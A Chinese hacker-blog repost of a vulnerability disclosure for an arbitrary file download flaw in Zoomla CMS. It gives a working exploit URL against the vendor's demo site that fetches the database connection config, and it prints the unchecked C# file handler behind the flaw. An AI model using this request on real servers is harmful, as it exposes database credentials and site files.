记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

逐浪CMS任意文件下载

2014-11-01 14:35

目前试了最新的逐浪CMS2 x2.0可以,然后官网的DEMO也可以

Config/ConnectionStrings.config为数据库连接文件,当然,整站都可以下载,只要换下就得了

 


http://demo.zoomla.cn/user/iServer/FiServerInfo.aspx?menu=filedown&filepath=//Config//ConnectionStrings.config

referrer:

http://demo.zoomla.cn/user/iServer/FiServer.aspx


 

zoomla.PNG

 

漏洞证明:

FiServerInfo.aspx对应的page_load函数,未经验证范围,导致全站可下载



protected void Page_Load(object sender, EventArgs e)
{
if (!string.IsNullOrEmpty(base.Request.QueryString["menu"]) && (base.Request.QueryString["menu"] == "filedown"))
{
string path = base.Request.QueryString["filepath"];
if (path != "")
{
FileInfo info = new FileInfo(base.Server.MapPath(path));
if (info.Exists)
{
base.Response.Clear();
base.Response.AddHeader("Content-Disposition", "attachment; filename=" + base.Server.UrlEncode(info.Name));
base.Response.AddHeader("Content-Length", info.Length.ToString());
base.Response.ContentType = "application/octet-stream";
base.Response.Filter.Close();
base.Response.WriteFile(info.FullName);
base.Response.End();
}
else
{
base.Response.Write("<script>alert('该文件不存在!');history.go(-1);</script>");
}
}
}
if (!base.IsPostBack)
{
int questionId = DataConverter.CLng(base.Request.QueryString["QuestionId"]);
this.MyBind(questionId);
this.spfiletype.InnerHtml = SiteConfig.SiteOption.UploadFileExts;
}
}

 


知识来源: www.2cto.com/Article/201411/348060.html

阅读:90253 | 评论:0 | 标签:cms

想收藏或者和大家分享这篇好文章→复制链接地址

“逐浪CMS任意文件下载”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云